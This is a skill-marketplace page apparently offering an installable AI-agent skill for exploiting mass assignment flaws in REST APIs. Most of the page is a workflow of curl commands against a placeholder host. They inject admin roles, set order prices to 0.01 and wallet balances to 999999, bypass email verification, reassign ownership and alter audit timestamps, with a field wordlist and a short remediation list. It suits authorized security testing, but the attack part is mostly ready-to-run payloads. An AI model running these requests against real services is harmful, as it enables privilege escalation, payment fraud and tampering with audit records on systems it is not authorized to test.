Run any Skill in Manus with one click

exploiting-mass-assignment-in-rest-apis

Stars6

Forks2

UpdatedMarch 16, 2026 at 00:59

Discover and exploit mass assignment vulnerabilities in REST APIs to escalate privileges, modify restricted fields, and bypass authorization controls by injecting unexpected parameters in API requests.

Installation

Install with Codex or Claude Copy this prompt, paste it into Codex, Claude, or another assistant, and let it review the skill page and install it for you.

Run Skill in Manus

Source

autohandai

autohandai/community-skills

View GitHub Repository View Creator Repositories

Download

Run Skill in Manus

Related occupationsSOC

Based on SOC occupation classification

Information Security AnalystsComputer and Mathematical Occupations·SOC 15-1212

File Explorer

4 files

SKILL.md

readonly

More from this repository

same repository

triaging-vulnerabilities-with-ssvc-framework

autohandai/community-skills

Triage and prioritize vulnerabilities using CISA's Stakeholder-Specific Vulnerability Categorization (SSVC) decision tree framework to produce actionable remediation priorities.

2026-03-186

performing-soc-2-type-ii-audit-preparation

autohandai/community-skills

SOC 2 Type II audit preparation involves designing, implementing, and demonstrating the operational effectiveness of controls aligned to the AICPA Trust Services Criteria (TSC) over a defined audit pe

2026-03-186

userinterface-wiki

autohandai/community-skills

UI/UX best practices for web interfaces. Use when reviewing animations, CSS, audio, typography, UX patterns, prefetching, or icon implementations. Covers 11 categories from animation principles to typography. Outputs file:line findings.

2026-03-186

configuring-aws-verified-access-for-ztna

autohandai/community-skills

Configure AWS Verified Access to provide VPN-less zero trust network access to internal applications using identity and device posture verification with Cedar policy language.

2026-03-166

configuring-identity-aware-proxy-with-google-iap

autohandai/community-skills

Configuring Google Cloud Identity-Aware Proxy (IAP) to enforce per-request identity verification for Compute Engine, App Engine, Cloud Run, and GKE services using access levels, context-aware policies, and programmatic access with service accounts.

2026-03-166

configuring-zscaler-private-access-for-ztna

autohandai/community-skills

Configuring Zscaler Private Access (ZPA) to replace traditional VPN with zero trust network access by deploying App Connectors, defining application segments, configuring access policies based on user identity and device posture, and integrating with IdPs.

2026-03-166

name	exploiting-mass-assignment-in-rest-apis
description	Discover and exploit mass assignment vulnerabilities in REST APIs to escalate privileges, modify restricted fields, and bypass authorization controls by injecting unexpected parameters in API requests.
domain	cybersecurity
subdomain	web-application-security
tags	["mass-assignment","api-security","privilege-escalation","rest-api","autobinding","parameter-injection","owasp-api"]
version	1.0
author	mahipal
license	Apache-2.0

Exploiting Mass Assignment in REST APIs

When to Use

When testing REST APIs that accept JSON input for creating or updating resources
During API security assessments of applications using ORM frameworks (Rails, Django, Laravel, Spring)
When testing user registration, profile update, or account management endpoints
During bug bounty hunting on applications with CRUD API operations
When evaluating role-based access control implementation in API-driven applications

Prerequisites

Burp Suite or Postman for API request crafting and interception
Understanding of ORM auto-binding behavior in common frameworks
API documentation or endpoint discovery through reconnaissance
Multiple user accounts with different privilege levels for testing
Knowledge of common sensitive fields (role, isAdmin, verified, balance, price)
Arjun or param-miner for hidden parameter discovery

Workflow

Step 1 — Discover API Structure and Fields

# Examine API responses to identify all object fields
curl -H "Authorization: Bearer USER_TOKEN" http://target.com/api/users/me | jq .
# Response reveals fields: id, username, email, role, isAdmin, verified, balance

# Check API documentation for exposed schemas
curl http://target.com/api/docs
curl http://target.com/swagger.json
curl http://target.com/openapi.yaml

# Use Arjun for hidden parameter discovery
arjun -u http://target.com/api/users/me -m JSON -H "Authorization: Bearer USER_TOKEN"

# Examine create/update request body vs response body
# The response may contain more fields than the request sends
# Those extra fields are mass assignment candidates

Step 2 — Test Privilege Escalation via Role Fields

# Inject role/admin fields in profile update
curl -X PUT http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"username":"testuser","email":"test@test.com","role":"admin"}'

# Try common admin field names
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"isAdmin":true}'

curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"is_admin":true,"admin":true,"role":"superadmin","user_type":"admin","privilege_level":99}'

# Test during registration
curl -X POST http://target.com/api/register \
  -H "Content-Type: application/json" \
  -d '{"username":"newadmin","password":"pass123","email":"admin@evil.com","role":"admin","isAdmin":true}'

Step 3 — Test Financial and Business Logic Fields

# Modify price or balance fields
curl -X POST http://target.com/api/orders \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"product_id":1,"quantity":1,"price":0.01}'

# Modify account balance
curl -X PATCH http://target.com/api/wallet \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"balance":999999}'

# Modify discount or coupon fields
curl -X POST http://target.com/api/checkout \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"cart_id":123,"discount_percent":100,"coupon_code":"NONE"}'

# Modify subscription tier
curl -X PATCH http://target.com/api/subscription \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"plan":"enterprise","price":0}'

Step 4 — Test Verification and Status Fields

# Bypass email verification
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"email_verified":true,"verified":true,"active":true}'

# Modify account status
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"status":"active","banned":false,"suspended":false}'

# Modify ownership/organization
curl -X PATCH http://target.com/api/users/me \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"organization_id":"target-org-uuid","team_id":"admin-team"}'

Step 5 — Test Relationship and Foreign Key Manipulation

# Change resource ownership
curl -X PATCH http://target.com/api/documents/123 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"owner_id":"admin-user-id"}'

# Assign to different group/team
curl -X PATCH http://target.com/api/projects/456 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"team_id":"privileged-team","access_level":"write"}'

# Modify created_at/updated_at for audit log manipulation
curl -X PATCH http://target.com/api/entries/789 \
  -H "Authorization: Bearer USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"created_at":"2020-01-01","created_by":"other-user-id"}'

Step 6 — Automate Mass Assignment Testing

# Use Burp Intruder with field names wordlist
# Wordlist of common mass assignment fields:
# role, admin, isAdmin, is_admin, user_type, privilege, level
# verified, email_verified, active, banned, suspended
# balance, credits, price, discount, plan, tier
# owner_id, organization_id, team_id, group_id

# Python automation script
python3 mass_assignment_tester.py \
  --url http://target.com/api/users/me \
  --method PATCH \
  --token "Bearer USER_TOKEN" \
  --fields-file mass_assignment_fields.txt

# Nuclei mass assignment templates
echo "http://target.com" | nuclei -t http/vulnerabilities/generic/mass-assignment.yaml

Key Concepts

Concept	Description
Mass Assignment	ORM auto-binding of request parameters to model attributes without restriction
Autobinding	Framework feature that maps HTTP parameters directly to object properties
Allowlist	Server-side list of permitted fields for update operations (strong_parameters in Rails)
Denylist	List of forbidden fields (less secure than allowlist approach)
Hidden Fields	Server-managed fields (role, balance) not shown in forms but accepted by API
DTO (Data Transfer Object)	Pattern using separate objects for input vs. database to prevent mass assignment
Parameter Pollution	Sending unexpected extra parameters alongside legitimate ones

Tools & Systems

Tool	Purpose
Burp Suite	API request interception and parameter injection
Postman	API testing and collection-based mass assignment testing
Arjun	Hidden parameter discovery tool for API endpoints
param-miner	Burp extension for discovering hidden parameters
OWASP ZAP	Automated API scanning with parameter injection
swagger-codegen	Generate API clients from OpenAPI specs for testing

Common Scenarios

Admin Privilege Escalation — Inject "role":"admin" or "isAdmin":true in profile update to gain administrative access
Price Manipulation — Modify price or discount fields in order creation endpoints to purchase items at reduced cost
Email Verification Bypass — Set email_verified:true during registration or profile update to bypass verification requirements
Account Takeover — Modify email or phone fields to attacker-controlled values, then trigger password reset
Subscription Upgrade — Inject plan:"enterprise" in subscription update to gain premium features without payment

Output Format

## Mass Assignment Vulnerability Report
- **Target**: http://target.com/api/users/me
- **Method**: PATCH
- **Framework**: Ruby on Rails (detected via X-Powered-By)

### Findings
| # | Endpoint | Injected Field | Original | Modified | Impact |
|---|----------|---------------|----------|----------|--------|
| 1 | PATCH /api/users/me | role | "user" | "admin" | Privilege Escalation |
| 2 | POST /api/orders | price | 99.99 | 0.01 | Financial Loss |
| 3 | PATCH /api/users/me | email_verified | false | true | Verification Bypass |

### Remediation
- Implement allowlist (strong_parameters) for all model update operations
- Use DTOs/ViewModels to decouple API input from database models
- Apply field-level authorization checks on sensitive attributes
- Log and alert on attempts to modify restricted fields